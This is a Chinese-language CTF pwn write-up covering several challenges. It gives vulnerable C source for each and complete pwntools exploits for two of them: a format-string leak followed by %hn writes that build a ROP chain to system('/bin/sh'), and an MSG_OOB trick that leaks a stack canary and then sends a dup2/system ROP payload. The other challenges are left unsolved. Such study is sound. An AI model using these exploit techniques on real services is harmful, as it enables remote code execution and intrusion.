Verifmt#

Information#

Category: Pwn

Description#

Verifmt is a format string converter with a powerful verifier.

Write-up#

题目给了源码，还是很方便的：

1
#include <ctype.h>
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <string.h>
5

6
int verify_fmt(const char *fmt, size_t n_args) {
7
  size_t argcnt = 0;
8
  size_t len = strlen(fmt);
9

10
  for (size_t i = 0; i < len; i++) {
11
    if (fmt[i] == '%') {
12
      if (fmt[i+1] == '%') {
13
        i++;
14
        continue;
15
      }
16

17
      if (isdigit(fmt[i+1])) {
18
        puts("[-] Positional argument not supported");
19
        return 1;
20
      }
21

22
      if (argcnt >= n_args) {
23
        printf("[-] Cannot use more than %lu specifiers\n", n_args);
24
        return 1;
25
      }
26

27
      argcnt++;
28
    }
29
  }
30

31
  return 0;
32
}
33

34
int main() {
35
  size_t n_args;
36
  long args[4];
37
  char fmt[256];
38

39
  setbuf(stdin, NULL);
40
  setbuf(stdout, NULL);
41

42
  while (1) {
43
    /* Get arguments */
44
    printf("# of args: ");
45
    if (scanf("%lu", &n_args) != 1) {
46
      return 1;
47
    }
48

49
    if (n_args > 4) {
50
      puts("[-] Maximum of 4 arguments supported");
51
      continue;
52
    }
53

54
    memset(args, 0, sizeof(args));
55
    for (size_t i = 0; i < n_args; i++) {
56
      printf("args[%lu]: ", i);
57
      if (scanf("%ld", args + i) != 1) {
58
        return 1;
59
      }
60
    }
61

62
    /* Get format string */
63
    while (getchar() != '\n');
64
    printf("Format string: ");
65
    if (fgets(fmt, sizeof(fmt), stdin) == NULL) {
66
      return 1;
67
    }
68

69
    /* Verify format string */
70
    if (verify_fmt(fmt, n_args)) {
71
      continue;
72
    }
73

74
    /* Enjoy! */
75
    printf(fmt, args[0], args[1], args[2], args[3]);
76
  }
77

78
  return 0;
79
}

发现只是对格式化字符串做了一些限制，不能利用位置参数泄漏指定值，再者就是最多只能使用四个格式化字符串标志符（以 % 打头算一个），且格式化字符串格式也是固定为 printf(fmt, args[0], args[1], args[2], args[3]);，但是传入 printf 的所有参数都是可控的。

这题基本上只要搞明白怎么泄漏地址就赢了，涉及到一个 * 参数的概念，如果我们输入 %*.*p%*.*p，这四个 * 就会分别用 args[0] ~ args[4] 为参数，且 p 也各占一个参数位，此时我们只使用了两个 % 标识符，就已经消耗了六个参数，另外还剩两次机会。好巧不巧，栈上就有一个地址，正好是第七个参数，所以直接再加一个 %p 泄漏即可。

泄漏了栈地址我们就知道返回地址，调试发现返回地址处保存的正好是 libc 地址，我们可以直接控制 rsi 为返回地址，fmt 为 %s 以此泄漏 libc，之后就随便打打了。

Exploit#

1
#!/usr/bin/env python3
2

3
import argparse
4

5
from pwn import (
6
    ELF,
7
    context,
8
    flat,
9
    process,
10
    raw_input,
11
    remote,
12
)
13

14
parser = argparse.ArgumentParser()
15
parser.add_argument("-L", action="store_true")
16
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
17
args = parser.parse_args()
18

19

20
FILE = "./chall_patched"
21
HOST, PORT = "localhost", 1337
22

23
context(log_level="debug", binary=FILE, terminal="kitty")
24

25
elf = context.binary
26
libc = elf.libc
27

28

29
def set_args(cnt, *args_values, fmt):
30
    target.sendlineafter(b"# of args: ", str(cnt).encode())
31

32
    for i, val in enumerate(args_values):
33
        if val is not None:
34
            prompt = f"args[{i}]: "
35
            target.sendlineafter(prompt.encode(), str(val).encode())
36

37
    # raw_input("DEBUG")
38
    target.sendlineafter(b"Format string: ", fmt)
39

40

41
def mangle(pos, ptr, shifted=1):
42
    if shifted:
43
        return pos ^ ptr
44
    return (pos >> 12) ^ ptr
45

46

47
def demangle(pos, ptr, shifted=1):
48
    if shifted:
49
        return mangle(pos, ptr)
50
    return mangle(pos, ptr, 0)
51

52

53
def launch():
54
    global target, targets
55

56
    if args.L and args.threads is not None:
57
        raise ValueError("Options -L and -T cannot be used together.")
58

59
    if args.L:
60
        target = process(FILE)
61
    elif args.threads:
62
        if args.threads <= 0:
63
            raise ValueError("Thread count must be positive.")
64
        process(FILE)
65

66
        targets = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
67
        target = targets[0]
68
    else:
69
        target = remote(HOST, PORT, ssl=True)
70

71

72
def main():
73
    launch()
74

75
    set_args(4, 1, 2, 3, 4, fmt=b"%*.*p%*.*p %p")
76

77
    target.recvuntil(b" ")
78
    stack = int(target.recvline(), 16)
79
    pie = stack + 0x158
80
    ret = stack + 0x170
81

82
    target.success(f"stack: {hex(stack)}")
83
    target.success(f"pie: {hex(pie)}")
84
    target.success(f"ret: {hex(ret)}")
85

86
    set_args(1, ret, fmt=b"%s")
87
    libc.address = int.from_bytes(target.recv(0x6), "little") - 0x29D90
88

89
    set_args(1, pie, fmt=b"%s")
90
    elf.address = int.from_bytes(target.recv(0x6), "little") - 0x1160
91

92
    target.success(f"libc: {hex(libc.address)}")
93
    target.success(f"pie: {hex(elf.address)}")
94

95
    pop_rdi_ret = elf.address + 0x0000000000001282
96
    binsh = next(libc.search(b"/bin/sh"))
97
    system = libc.sym["system"]
98
    align = elf.address + 0x000000000000101A
99

100
    set_args(3, pop_rdi_ret & 0xFFFF, 0, ret, fmt=b"%*c%hn")
101
    set_args(3, (pop_rdi_ret >> 16) & 0xFFFF, 0, ret + 2, fmt=b"%*c%hn")
102
    set_args(3, (pop_rdi_ret >> 32) & 0xFFFF, 0, ret + 4, fmt=b"%*c%hn")
103
    set_args(3, binsh & 0xFFFF, 0, ret + 0x8, fmt=b"%*c%hn")
104
    set_args(3, (binsh >> 16) & 0xFFFF, 0, ret + 0x8 + 2, fmt=b"%*c%hn")
105
    set_args(3, (binsh >> 32) & 0xFFFF, 0, ret + 0x8 + 4, fmt=b"%*c%hn")
106
    set_args(3, align & 0xFFFF, 0, ret + 0x10, fmt=b"%*c%hn")
107
    set_args(3, (align >> 16) & 0xFFFF, 0, ret + 0x10 + 2, fmt=b"%*c%hn")
108
    set_args(3, (align >> 32) & 0xFFFF, 0, ret + 0x10 + 4, fmt=b"%*c%hn")
109
    set_args(3, system & 0xFFFF, 0, ret + 0x18, fmt=b"%*c%hn")
110
    set_args(3, (system >> 16) & 0xFFFF, 0, ret + 0x18 + 2, fmt=b"%*c%hn")
111
    set_args(3, (system >> 32) & 0xFFFF, 0, ret + 0x18 + 4, fmt=b"%*c%hn")
112

113
    target.sendlineafter(b"# of args: ", b"A")
114
    target.interactive()
115

116

117
if __name__ == "__main__":
118
    main()

Stack Prelude#

Information#

Category: Pwn

Description#

It is either easy or impossible.

Write-up#

比赛期间没做出来，赛后复现的，纯纯的经验题好吧……

题目源码如下：

1
#define _GNU_SOURCE
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <netinet/in.h>
5
#include <sys/socket.h>
6
#include <sys/types.h>
7
#include <unistd.h>
8

9
int main(int argc, char **argv) {
10
  struct sockaddr_in cli, addr = {0};
11
  socklen_t clen;
12
  int cfd, sfd = -1, yes = 1;
13
  ssize_t n;
14
  char buf[0x100];
15
  unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);
16

17
  if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
18
    perror("socket");
19
    goto err;
20
  }
21

22
  if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
23
    perror("setsockopt(SO_REUSEADDR)");
24
    goto err;
25
  }
26

27
  addr.sin_family = AF_INET;
28
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
29
  addr.sin_port = htons(port);
30

31
  if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
32
    perror("bind");
33
    goto err;
34
  }
35

36
  if (listen(sfd, 1) < 0) {
37
    perror("listen");
38
    goto err;
39
  }
40

41
  clen = sizeof(cli);
42
  if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
43
    perror("accept");
44
    goto err;
45
  }
46

47
  while (1) {
48
    n = 0;
49
    recv(cfd, &n, sizeof(ssize_t), MSG_WAITALL);
50
    if (n <= 0 || n >= 0x200)
51
      break;
52

53
    recv(cfd, buf, n, MSG_WAITALL);
54
    send(cfd, buf, n, 0);
55
  }
56

57
  return 0;
58

59
err:
60
  if (sfd >= 0) close(sfd);
61
  return 1;
62
}

这题是个一次只能处理一个请求的 socket 服务器，先说说我当时取得的成果吧……我是发现可以发送半闭 FIN 包使 recv 函数不接收完整的数据直接返回，由于没有检查 recv 函数的返回值，后面的 send 会泄漏栈数据。

这里提到的半闭 FIN 包可以通过 target.shutdown("write") 发送关闭输入的半闭包，保留输出，但是这么做的问题就在于，关闭了输入后在 send 结束回到 while 循环头后 recv 接收不到数据，返回 0，退出循环，结束程序。所以即使我们泄漏了数据，要是不能继续和程序交互的话也只能是干瞪眼……

草啊，其实当时是很有希望做出这道题的，但是没有想过我可以给自己发送的数据加 flags，如果能想到这点的话这题就秒了……感觉自己是猪头，我连 FIN 都想到了，就是没想到 flags，这难道不是一个很自然的想法吗？？气死我了 smh（

现场学能绕过 MSG_WAITALL 的方法，总结为如下几种情况：

对端关闭连接 (FIN)
对端异常断开 (RST)
中断信号
超时（前提是设置了 SO_RCVTIMEO flag）
其它奇奇怪怪的致命错误

FIN 可以排除了，因为发了这个后续不能继续操作，超时也可以排除，因为没设置这个 flag，我们可以重点研究一下有哪些可以由 client 端发送的 flag 会触发中断信号，这里就不赘述了，直接说结论 —— MSG_OOB，这个 flag 表示 out-of-band，如果用在 send，就代表会使用一个额外的 urgent byte，表示外带数据，接收端处理 TCP 数据包发现 urgent byte 会触发 SIGURG 信号，这个信号属于异步事件，可以打断带有 MSG_WAITALL flag 的 recv 函数。

现在我们泄漏了数据，又能维持交互，那剩下的应该没啥好说的了，只需要注意 socket server 需要让 stdin 和 stdout 指向 socket 通道就好了，不然无法和返回的 shell 交互。

Exploit#

1
#!/usr/bin/env python3
2

3
import argparse
4

5
from pwn import (
6
    ELF,
7
    constants,
8
    context,
9
    flat,
10
    process,
11
    raw_input,
12
    remote,
13
)
14

15
parser = argparse.ArgumentParser()
16
parser.add_argument("-L", action="store_true")
17
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
18
args = parser.parse_args()
19

20

21
FILE = "./chall_patched"
22
HOST, PORT = "localhost", 1337
23

24
context(log_level="debug", binary=FILE, terminal="kitty")
25

26
elf = context.binary
27
libc = elf.libc
28

29

30
def mangle(pos, ptr, shifted=1):
31
    if shifted:
32
        return pos ^ ptr
33
    return (pos >> 12) ^ ptr
34

35

36
def demangle(pos, ptr, shifted=1):
37
    if shifted:
38
        return mangle(pos, ptr)
39
    return mangle(pos, ptr, 0)
40

41

42
def launch(argv=None, envp=None):
43
    global target, thread
44

45
    if argv is None:
46
        argv = [FILE]
47

48
    if args.L and args.threads is not None:
49
        raise ValueError("Options -L and -T cannot be used together.")
50

51
    if args.L:
52
        target = process(argv, env=envp)
53
    elif args.threads:
54
        if args.threads <= 0:
55
            raise ValueError("Thread count must be positive.")
56
        process(argv, env=envp)
57

58
        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
59
    else:
60
        target = remote(HOST, PORT, ssl=True)
61

62

63
def main():
64
    launch([FILE, "1337"])
65

66
    thread[0].sendline(flat(0x120))
67
    thread[0].sock.send(b"A" * 2, constants.MSG_OOB)
68

69
    resp = thread[0].recv(0x120)
70
    canary = int.from_bytes(resp[0x108:0x110], "little")
71
    libc.address = int.from_bytes(resp[0x118:0x120], "little") - 0x2A1CA
72

73
    thread[0].success(f"canary: {hex(canary)}")
74
    thread[0].success(f"libc: {hex(libc.address)}")
75

76
    raw_input("DEBUG")
77
    thread[0].sendline(flat(0x188))
78

79
    pop_rdi_ret = libc.address + 0x000000000010F78B
80
    pop_rsi_ret = libc.address + 0x0000000000110A7D
81
    binsh = next(libc.search(b"/bin/sh"))
82
    dup2 = libc.sym["dup2"]
83
    system = libc.sym["system"]
84
    align = pop_rdi_ret + 1
85
    payload = flat(
86
        {
87
            0x108 - 1: canary,
88
            0x118 - 1: pop_rdi_ret,
89
            0x120 - 1: 4,
90
            0x128 - 1: pop_rsi_ret,
91
            0x130 - 1: 0,
92
            0x138 - 1: dup2,
93
            0x140 - 1: pop_rdi_ret,
94
            0x148 - 1: 4,
95
            0x150 - 1: pop_rsi_ret,
96
            0x158 - 1: 1,
97
            0x160 - 1: dup2,
98
            0x168 - 1: align,
99
            0x170 - 1: pop_rdi_ret,
100
            0x178 - 1: binsh,
101
            0x180 - 1: system,
102
        },
103
        filler=b"\x00",
104
    )
105
    raw_input("DEBUG")
106
    thread[0].sendline(payload)
107

108
    thread[0].sendline(flat(0x200))
109

110
    thread[0].interactive()
111

112

113
if __name__ == "__main__":
114
    main()

Stack Impromptu#

Information#

Category: Pwn

Description#

The word impossible is not in my dictionary.

Write-up#

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <string.h>
4
#include <netinet/in.h>
5
#include <sys/socket.h>
6
#include <sys/types.h>
7
#include <unistd.h>
8
#include <pthread.h>
9

10
void fatal(const char *msg) {
11
  perror(msg);
12
  pthread_exit(NULL);
13
}
14

15
int server_read(int& fd) {
16
  size_t size;
17
  char buf[0x40];
18

19
  memset(buf, 0, sizeof(buf));
20
  if (read(fd, &size, sizeof(size)) != sizeof(size)
21
      || size > 0x100
22
      || read(fd, buf, size) < size)
23
    goto err;
24

25
  write(fd, buf, size);
26
  return 0;
27

28
err:
29
  close(fd);
30
  fatal("Could not receive data (read)");
31
  return 1;
32
}
33

34
void* server_main(void* arg) {
35
  int fd = (int)((intptr_t)arg);
36
  while (server_read(fd) == 0);
37
  return NULL;
38
}
39

40
int main(int argc, char** argv) {
41
  pthread_t th;
42
  struct sockaddr_in cli, addr = { 0 };
43
  socklen_t clen;
44
  int cfd, sfd = -1, yes = 1;
45
  unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);
46

47
  if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
48
    perror("socket");
49
    goto err;
50
  }
51

52
  if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
53
    perror("setsockopt(SO_REUSEADDR)");
54
    goto err;
55
  }
56

57
  addr.sin_family = AF_INET;
58
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
59
  addr.sin_port = htons(port);
60

61
  if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
62
    perror("bind");
63
    goto err;
64
  }
65

66
  if (listen(sfd, 5) < 0) {
67
    perror("listen");
68
    goto err;
69
  }
70

71
  while (1) {
72
    clen = sizeof(cli);
73
    if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
74
      perror("accept");
75
      goto err;
76
    }
77

78
    pthread_create(&th, NULL, server_main, (void*)((intptr_t)cfd));
79
    pthread_detach(th);
80
  }
81

82
  return 0;
83

84
err:
85
  if (sfd >= 0) close(sfd);
86
  return 1;
87
}

待复现。

Exploit#

Stack Rhapsody#

Information#

Category: Pwn

Description#

Unknown

Write-up#

1
#include <stdio.h>
2
#include <stdlib.h>
3

4
int main() {
5
  char buf[0x10000];
6
  fgets(buf, 0x100000, stdin);
7
  system("echo Are you a good pwner?");
8
  return 0;
9
}

待复现。

Exploit#

Scream#

Information#

Category: Pwn

Description#

Keep the secret.

Write-up#

待复现。

Exploit#

EDU#

Information#

Category: Pwn

Description#

QEMU provides an educational device for learning VM escape. This bug is intentionally made for educational purpose, right? …… Right?

https://www.qemu.org/docs/master/specs/edu.html

Write-up#

待复现。